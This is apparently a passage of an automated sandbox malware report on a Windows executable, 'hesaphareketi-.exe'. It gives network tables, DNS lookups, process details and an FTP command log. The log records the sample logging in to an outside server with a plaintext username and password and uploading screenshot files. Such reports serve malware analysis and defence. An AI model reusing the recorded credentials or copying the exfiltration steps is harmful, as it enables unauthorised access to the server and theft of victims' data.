May 23, 2024 20:30:01.790853024 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.791191101 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.796251059 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.796484947 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.801398993 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801417112 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801428080 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801439047 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801454067 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801465034 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801475048 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801486015 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801491976 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801497936 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.801563025 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.806185007 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.806386948 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.810995102 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811016083 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811028957 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811038971 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811049938 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811059952 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.811063051 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811074018 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811084986 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811094999 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811105013 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811131954 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.811172962 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.815944910 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820704937 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820719957 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820729017 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820740938 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820744991 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820755959 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820765972 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820775986 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.867315054 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.867474079 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.932956934 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:02.278111935 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:02.335674047 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.058726072 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.065123081 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.284538984 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.287297010 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.294459105 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.294996023 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.298707962 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.299890995 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.401684046 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.414865971 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.415007114 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.415208101 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.742721081 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.383380890 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.546039104 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.546269894 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556113005 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556129932 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556139946 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556149006 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556159019 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556176901 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556215048 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556231022 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556231022 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556231022 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.577223063 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.577326059 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.581938982 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581963062 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581971884 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581979990 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581989050 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581996918 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582006931 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582015991 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582024097 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582032919 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582041025 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582048893 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582154036 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.582154036 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.582180023 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.592370987 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592390060 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592398882 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592407942 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592417002 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592425108 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592619896 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.600821972 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.600941896 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.607748985 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.612492085 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.612513065 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.612523079 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.612531900 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.663853884 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.663906097 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.665992022 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:11.081517935 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:11.242500067 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.682627916 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.687678099 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:17.913454056 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:17.913958073 CEST | 49764 | 56060 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.922492027 CEST | 56060 | 49764 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:17.922573090 CEST | 49764 | 56060 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.922663927 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.980374098 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 23, 2024 20:26:13.543620110 CEST | 58940 | 53 | 192.168.2.4 | 1.1.1.1 |
May 23, 2024 20:26:13.585087061 CEST | 53 | 58940 | 1.1.1.1 | 192.168.2.4 |
May 23, 2024 20:26:15.380846024 CEST | 53778 | 53 | 192.168.2.4 | 1.1.1.1 |
May 23, 2024 20:26:15.760234118 CEST | 53 | 53778 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
May 23, 2024 20:26:13.543620110 CEST | 192.168.2.4 | 1.1.1.1 | 0x7ba | Standard query (0) | | A (IP address) | IN (0x0001) | false |
May 23, 2024 20:26:15.380846024 CEST | 192.168.2.4 | 1.1.1.1 | 0xee9d | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
May 23, 2024 20:26:13.585087061 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ba | No error (0) | | | 104.26.12.205 | A (IP address) | IN (0x0001) | false |
May 23, 2024 20:26:13.585087061 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ba | No error (0) | | | 172.67.74.152 | A (IP address) | IN (0x0001) | false |
May 23, 2024 20:26:13.585087061 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ba | No error (0) | | | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
May 23, 2024 20:26:15.760234118 CEST | 1.1.1.1 | 192.168.2.4 | 0xee9d | No error (0) | | | 104.247.165.99 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49732 | 104.26.12.205 | 443 | 3496 | C:\Users\user\Desktop\hesaphareketi-.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 18:26:14 UTC | 155 | OUT | |
2024-05-23 18:26:14 UTC | 211 | IN | |
2024-05-23 18:26:14 UTC | 12 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
May 23, 2024 20:28:46.731831074 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 5 of 50 allowed. 220-Local time is now 21:28. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:28:46.732157946 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | USER admin@normagroup.com.tr |
May 23, 2024 20:28:47.127262115 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 331 User admin@normagroup.com.tr OK. Password required |
May 23, 2024 20:28:47.127713919 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASS Qb.X[.j.Yfm[ |
May 23, 2024 20:28:47.617975950 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 230 OK. Current restricted directory is / |
May 23, 2024 20:28:47.921236992 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 504 Unknown command |
May 23, 2024 20:28:47.921576977 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PWD |
May 23, 2024 20:28:48.150744915 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 257 "/" is your current location |
May 23, 2024 20:28:48.151035070 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | TYPE I |
May 23, 2024 20:28:48.499938965 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
May 23, 2024 20:28:48.500075102 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:28:48.805833101 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,244,128) |
May 23, 2024 20:28:48.854190111 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_07_28_11_34_19.jpeg |
May 23, 2024 20:28:49.593909979 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:28:50.311012983 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226 0.532 seconds (measured here), 104.27 Kbytes per second |
May 23, 2024 20:28:50.381091118 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226 0.532 seconds (measured here), 104.27 Kbytes per second |
May 23, 2024 20:29:00.326834917 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:29:00.568528891 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,253,66) |
May 23, 2024 20:29:00.578975916 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_08_09_10_55_29.jpeg |
May 23, 2024 20:29:01.207123995 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:29:01.702121973 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226 0.493 seconds (measured here), 112.42 Kbytes per second |
May 23, 2024 20:29:04.308434963 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:29:04.818742037 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,229,88) |
May 23, 2024 20:29:04.829952002 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_08_13_10_17_39.jpeg |
May 23, 2024 20:29:05.467633963 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:29:05.965930939 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226 0.496 seconds (measured here), 111.76 Kbytes per second |
May 23, 2024 20:29:14.668451071 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:29:14.906666040 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,218,145) |
May 23, 2024 20:29:14.915680885 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_08_19_17_12_53.jpeg |
May 23, 2024 20:29:15.544559002 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:29:16.068845987 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226 0.513 seconds (measured here), 108.05 Kbytes per second |
May 23, 2024 20:29:59.728112936 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 6 of 50 allowed. 220-Local time is now 21:29. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:29:59.728311062 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | USER admin@normagroup.com.tr |
May 23, 2024 20:29:59.975085020 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 331 User admin@normagroup.com.tr OK. Password required |
May 23, 2024 20:29:59.975284100 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PASS Qb.X[.j.Yfm[ |
May 23, 2024 20:30:00.230171919 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 230 OK. Current restricted directory is / |
May 23, 2024 20:30:00.459373951 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 504 Unknown command |
May 23, 2024 20:30:00.459501028 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PWD |
May 23, 2024 20:30:00.683608055 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 257 "/" is your current location |
May 23, 2024 20:30:00.683875084 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | TYPE I |
May 23, 2024 20:30:00.930624008 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
May 23, 2024 20:30:00.930823088 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:30:01.158257008 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,240,64) |
May 23, 2024 20:30:01.164067030 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_09_14_05_07_52.jpeg |
May 23, 2024 20:30:01.790853024 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:30:02.278111935 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226 0.487 seconds (measured here), 118.65 Kbytes per second |
May 23, 2024 20:30:09.058726072 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:30:09.284538984 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,238,192) |
May 23, 2024 20:30:09.294996023 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_09_20_19_39_17.jpeg |
May 23, 2024 20:30:10.546039104 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:30:10.556113005 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 7 of 50 allowed. 220-Local time is now 21:30. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:30:10.556129932 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:30:10.556139946 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 7 of 50 allowed. 220-Local time is now 21:30. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:30:10.556149006 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:30:10.556159019 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 7 of 50 allowed. 220-Local time is now 21:30. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:30:11.081517935 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226 1.134 seconds (measured here), 48.87 Kbytes per second |
May 23, 2024 20:30:17.682627916 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:30:17.913454056 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,218,252) |
May 23, 2024 20:30:17.922663927 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_05_23_14_30_16.jpeg |
Target ID: | 0 |
Start time: | 14:26:09 |
Start date: | 23/05/2024 |
Path: | C:\Users\user\Desktop\hesaphareketi-.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x440000 |
File size: | 939'008 bytes |
MD5 hash: | 6EE05D4DD363D273CE38C497B1238DB1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 14:26:12 |
Start date: | 23/05/2024 |
Path: | C:\Users\user\Desktop\hesaphareketi-.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x730000 |
File size: | 939'008 bytes |
MD5 hash: | 6EE05D4DD363D273CE38C497B1238DB1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
Reputation: | low |
Has exited: | false |
Execution Graph
Execution Coverage: | 7.5% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 55 |
Total number of Limit Nodes: | 1 |
Function | Relevance | APIs | Instructions | Tags |
---|---|---|---|---|
0275590D | 1.6 | 1 | 99 | COMMON |
027544E0 | 1.6 | 1 | 96 | COMMON |
0275B3F8 | 1.6 | 1 | 68 | COMMON |
0275B3E8 | 1.6 | 1 | 65 | COMMON |
0275D419 | 1.6 | 1 | 64 | COMMON |
0275B020 | 1.6 | 1 | 55 | library, COMMON |
0275B699 | 1.6 | 1 | 54 | library, COMMON |
02759D90 | 1.6 | 1 | 50 | COMMON |
00E1D4C4 | 0.1 | | 75 | COMMON |
00E2D1D4 | 0.1 | | 72 | COMMON |
00E2D01C | 0.1 | | 72 | COMMON |
00E2D005 | 0.1 | | 62 | COMMON |
00E1D4BF | 0.1 | | 56 | COMMON |
00E2D1CF | 0.1 | | 53 | COMMON |
00E1D745 | 0.0 | | 45 | COMMON |
00E1D744 | 0.0 | | 36 | COMMON |
0275DAEC | 0.3 | | 264 | COMMON |
Execution Graph
Execution Coverage: | 11% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 1.4% |
Total number of Nodes: | 208 |
Total number of Limit Nodes: | 26 |
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
06802358 | 9.0 | | 6 | 1486 | COMMON |
0680B218 | 8.3 | | 6 | 772 | COMMON |
06807D68 | 3.0 | | 2 | 471 | COMMON |
06805590 | 1.8 | | 1 | 595 | COMMON |
067F8FC8 | 1.6 | 1 | | 60 | COMMON |
068065D8 | 0.8 | | | 825 | COMMON |
0680C178 | 0.6 | | | 635 | COMMON |
0680ACB0 | 10.4 | | 8 | 393 | COMMON |
06809138 | 5.2 | | 4 | 231 | COMMON |
0680CF30 | 4.6 | | 3 | 804 | COMMON |
06804B58 | 3.9 | | 3 | 186 | COMMON |
06809127 | 2.7 | | 2 | 170 | COMMON |
06804B49 | 2.7 | | 2 | 154 | COMMON |
029FEA28 | 1.6 | 1 | | 131 | COMMON |
067F21F3 | 1.6 | 1 | | 116 | COMMON |
067F21F8 | 1.6 | 1 | | 113 | COMMON |
067F5B74 | 1.6 | 1 | | 97 | COMMON |
067F5DE0 | 1.6 | 1 | | 63 | COMMON |
067F5DE8 | 1.6 | 1 | | 62 | COMMON |
067F9783 | 1.6 | 1 | | 60 | COMMON |
029FE190 | 1.6 | 1 | | 55 | COMMON |
029FEAF8 | 1.6 | 1 | | 54 | COMMON |
067F0118 | 1.6 | 1 | | 50 | COMMON |
067F114B | 1.6 | 1 | | 50 | COMMON |
067F6C59 | 1.5 | 1 | | 47 | com, COMMON |
067F6C5C | 1.5 | 1 | | 46 | com, COMMON |
067F6A24 | 1.5 | 1 | | 46 | COMMON |
067F73A8 | 1.5 | 1 | | 45 | COMMON |
067F7871 | 1.5 | 1 | | 45 | com, COMMON |
0680DAA5 | 1.4 | | 1 | 119 | COMMON |
0680DAB8 | 1.4 | | 1 | 117 | COMMON |
068021BD | 1.4 | | 1 | 108 | COMMON |
068021D0 | 1.4 | | 1 | 105 | COMMON |
0680B208 | 0.3 | | | 298 | COMMON |
068061D8 | 0.2 | | | 229 | COMMON |
06804289 | 0.2 | | | 221 | COMMON |
068045A8 | 0.2 | | | 220 | COMMON |
06804298 | 0.2 | | | 218 | COMMON |
068045C0 | 0.2 | | | 210 | COMMON |
0680EB00 | 0.2 | | | 209 | COMMON |
0680EB10 | 0.2 | | | 201 | COMMON |
0680FBB0 | 0.2 | | | 171 | COMMON |
0680F951 | 0.2 | | | 171 | COMMON |
0680F960 | 0.2 | | | 163 | COMMON |
06805410 | 0.1 | | | 126 | COMMON |
0680FBA0 | 0.1 | | | 108 | COMMON |
06802080 | 0.1 | | | 95 | COMMON |
06802090 | 0.1 | | | 91 | COMMON |
06803A88 | 0.1 | | | 83 | COMMON |
06803A98 | 0.1 | | | 78 | COMMON |
0111D030 | 0.1 | | | 72 | COMMON |
0111D1F8 | 0.1 | | | 72 | COMMON |
0111D3A8 | 0.1 | | | 72 | COMMON |
06806D00 | 0.1 | | | 68 | COMMON |
06805401 | 0.1 | | | 67 | COMMON |
06803BA8 | 0.1 | | | 59 | COMMON |
068041E8 | 0.1 | | | 58 | COMMON |
06803B98 | 0.1 | | | 57 | COMMON |
06803860 | 0.1 | | | 55 | COMMON |
0680ED80 | 0.1 | | | 55 | COMMON |
0680A2E9 | 0.1 | | | 54 | COMMON |
0111D1F3 | 0.1 | | | 53 | COMMON |
0111D3A3 | 0.1 | | | 53 | COMMON |
0111D02B | 0.1 | | | 53 | COMMON |
06803048 | 0.1 | | | 53 | COMMON |
06803868 | 0.1 | | | 52 | COMMON |
068041F8 | 0.1 | | | 51 | COMMON |
0680ED90 | 0.0 | | | 49 | COMMON |
0680A2F8 | 0.0 | | | 46 | COMMON |
0680C7C0 | 0.0 | | | 33 | COMMON |
06806458 | 0.0 | | | 31 | COMMON |
06806468 | 0.0 | | | 22 | COMMON |
06807688 | 13.0 | | 10 | 468 | COMMON |
0680A918 | 10.2 | | 8 | 229 | COMMON |
06807088 | 9.2 | | 7 | 405 | COMMON |
068083C0 | 5.3 | | 4 | 282 | COMMON |
